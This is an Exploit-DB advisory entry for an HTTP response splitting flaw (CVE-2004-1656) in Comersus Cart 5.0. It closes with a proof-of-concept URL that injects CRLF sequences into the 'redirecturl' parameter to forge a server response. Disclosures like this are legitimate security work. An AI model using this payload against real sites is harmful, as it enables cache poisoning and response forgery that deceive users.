Comersus Cart 5.0 HTTP Response Splitting Vulnerability

2004-09-01T00:00:00
ID EDB-ID:24422
Type exploitdb
Reporter Maestro De-Seguridad
Modified 2004-09-01T00:00:00

Description

Comersus Cart 5.0 HTTP Response Splitting Vulnerability. CVE-2004-1656. Webapps exploit for asp platform

                                        
                                            source: http://www.securityfocus.com/bid/11083/info

Comersus Cart is reported prone to a HTTP response splitting vulnerability. A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or interpreted. This could aid in various attacks, which try to entice client users into a false sense of trust.

This issue was identified in Comersus Shopping Cart 5.0991, however, other versions may be affected as well. 

http://www.example.com/path_to_comersus/comersus_customerLoggedVerify.asp?

redirecturl=%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-L

ength:%2028%0d%0a%0d%0a{html}0wned%20by%20me{/html}